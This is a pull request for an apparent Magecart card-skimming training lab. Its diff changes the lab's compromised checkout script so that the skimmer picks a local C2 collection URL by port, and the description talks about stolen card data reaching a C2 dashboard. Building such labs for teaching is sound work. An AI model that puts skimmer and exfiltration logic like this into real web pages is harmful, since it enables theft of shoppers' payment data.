### PR TITLE
stolen data showing up when lab run from main directory

### DIFF
--- a/labs/01-basic-magecart/vulnerable-site/js/checkout-compromised.js
+++ b/labs/01-basic-magecart/vulnerable-site/js/checkout-compromised.js
@@ -258,7 +258,26 @@
     // Configuration - would be obfuscated in real attacks
     // Dynamically determine C2 URL based on environment
     const hostname = window.location.hostname
-    let exfilUrl = 'http://localhost:3000/collect' // Local development default
+    console.log("Inside malicious code at the start. Mohammad");
+    console.log("Printing  port...");
+    console.log(window.location.port);
+    let exfilUrl = '';
+    console.log("exfilUrl has been initialized to empty string");
+    console.log("printing typeof window.location.port to see type for this variable");
+    console.info(typeof window.location.port);
+    if (window.location.port === "8080"){
+      console.info("inside if statement in malicious code.");
+      exfilUrl = 'http://localhost:3000/collect'
+      console.info('exfilUrl from if statement is printed below');
+      console.info(exfilUrl);
+    }
+    else if (window.location.port === "9001"){
+      console.info("inside else if statement in malicious code.");
+      exfilUrl = 'http://localhost:9002/collect';
+      console.info('exfilUrl from else if statement is printed below');
+      console.info(exfilUrl);
+    }
+     // Local development default
 
     // Production and staging - use relative URL since C2 is proxied by nginx
     if (hostname.includes('run.app') || hostname.includes('pcioasis.com')) {


### PR DESCRIPTION
## Description
Fixes C2 server data collection issue when running labs from the main directory (port 9001).

## Problem
When running Lab 01 magecart attack from the main directory using `docker-compose up` in the repository root, stolen credit card data was not appearing in the C2 server dashboard at `localhost:9002/stolen`. The skimmer code was hardcoded to send data to `localhost:3000/collect`, which only works when running from the individual lab directory.

## Solution
Added port detection logic to dynamically set the correct C2 server exfilUrl based on the environment and which directory the lab is run from:
- **Port 8080** (lab directory): Uses `localhost:3000/collect`
- **Port 9001** (main directory): Uses `localhost:9002/collect`

## Testing
- ✅ Tested running from individual lab directory (`labs/01-basic-magecart`) - data collection works
- ✅ Tested running from main directory (repository root) - data collection now works
- ✅ Verified stolen data appears in C2 dashboard for both scenarios

## Files Changed
- `labs/01-basic-magecart/vulnerable-site/js/checkout-compromised.js`